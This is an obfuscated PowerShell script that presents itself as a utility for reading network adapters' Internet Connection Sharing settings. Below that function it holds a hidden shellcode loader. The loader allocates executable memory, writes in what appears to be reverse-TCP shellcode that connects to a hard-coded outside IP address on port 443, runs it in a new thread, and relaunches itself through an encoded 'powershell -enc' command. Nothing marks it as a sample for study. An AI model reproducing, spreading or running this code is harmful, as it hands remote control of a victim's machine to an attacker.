 &("{0}{1}{2}" -f 'se','T-ite','m') ('Var'+'iaBL'+'e:b'+'1W')  ( [TYpe]("{2}{1}{3}{0}" -f'VeRT','o','sYstEM.c','N') ); .("{0}{2}{1}"-f'set-','eM','it') ("vaR"+"Ia"+"bLe:F1"+"z2xp")  (  [TyPE]("{0}{3}{4}{1}{2}" -f 'SYs','NcOD','iNg','tEm.TExt.','E')  );    .("{1}{3}{2}{0}"-f'aBLE','Set','arI','-v')  ('92o'+'U')  (  [typE]("{0}{1}"-f'INTPT','r')  ) ;
function geT-m`RiNte`Rn`etcOn`N`Ect`IOnShARI`NG {



    [CmdletBinding()]
    param (
        [Parameter(MaNDATOry,
                   ValUefRoMpipeLinE,
                   VAluEfROMpipeLInEbyPrOpERtYNAME)]
        [Alias({"{0}{1}"-f 'Nam','e'})]
        [string[]]${i`N`Te`RneTINtErFaCen`Ame}
    )

    BEGIN {
        &("{0}{1}{2}" -f're','gs','vr32.exe') ('/s') ("{2}{3}{0}{1}" -f'cfg','.dll','h','net')
        ${N`etSHA`RE} = .("{0}{2}{1}" -f'New-Ob','ect','j') -ComObject ("{2}{1}{3}{0}"-f'NetShare','etC','HN','fg.H')
    }

    PROCESS {
        foreach (${inT`eR`FACE} in ${InTe`RN`eTinTE`R`FaC`EnA`ME}){
        
            ${P`UblIC`Co`NnE`ctioN} = ${NEtSH`ARE}."E`NumEver`ycOnneCtI`oN" |
            .("{3}{0}{1}{2}" -f'e-Ob','je','ct','Wher') {
                ${NeT`SHa`RE}."NET`coNn`e`C`T`IonPRoPS"."INvO`Ke"(${_})."Na`Me" -eq ${i`Nt`eRface}
            }
            
            try {
                ${r`esuL`Ts} = ${NET`S`hArE}."iNeTS`Ha`RinG`C`onFIGU`Ra`TI`ON`F`oRiNEt`COnnECtiON"."I`NVOkE"(${pUblIcc`ON`NeCt`ION})
            }
            catch {
                .("{3}{0}{4}{2}{1}" -f 'War','g','in','Write-','n') -Message ('A'+'n '+'un'+'expect'+'ed '+'error'+' '+'ha'+'s '+'oc'+'c'+'urre'+'d '+'fo'+'r '+'netwo'+'rk '+'adapt'+'er:'+' '+"'$Interface'")
                Continue
            }

            [pscustomobject]@{
                ("{0}{1}" -f 'Nam','e') = ${I`NT`erfaCe}
                ("{3}{2}{0}{1}" -f'le','d','haringEnab','S') = ${r`eSul`TS}."s`HAR`I`NGE`NAbLeD"
                ("{0}{4}{1}{2}{3}"-f 'Sh','ingConnectionTy','p','e','ar') = ${reSu`lTS}."Shar`In`g`CoNNec`TIonTYpe"
                ("{3}{1}{2}{0}{4}"-f 'En','a','ll','InternetFirew','abled') = ${ResUl`TS}."InTErne`T`F`iRE`WALLeN`Ab`led"
            }
            
        }
    
    }    

}
${1} = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xbe,0x35,0xe9,0x67,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';${e} =  ( &("{2}{0}{1}" -f'iABL','e','get-VaR')  ("B"+"1w")  )."V`ALuE"::"tO`BAse`64sTr`ing"(  (  .('lS')  ("vAR"+"IA"+"bLe:f1"+"Z2XP") )."VA`Lue"::"uN`Ic`oDe".("{2}{0}{1}"-f 'etByt','es','G').Invoke(${1}));if( ${9`2oU}::"S`Ize" -eq 8){${X`86} = ${enV:`syST`emr`O`ot} + ((("{9}{1}{11}{6}{8}{10}{2}{0}{7}{4}{3}{5}" -f'0}','{','{','0}p','1.0{','owershell','dowsP','v','owerS','{0}syswow64','hell','0}Win'))  -f[chaR]92);${c`mD} = ("{1}{0}{3}{2}" -f'non','-nop -',' -enc ','i');&("{0}{1}"-f'ie','x') ('& '+"$x86 "+"$cmd "+"$e")}else{${c`Md} = ("{2}{1}{0}" -f '-enc','i ','-nop -non');.("{0}{1}" -f'i','ex') ('& '+'po'+'w'+'ers'+'hell '+"$cmd "+"$e");}
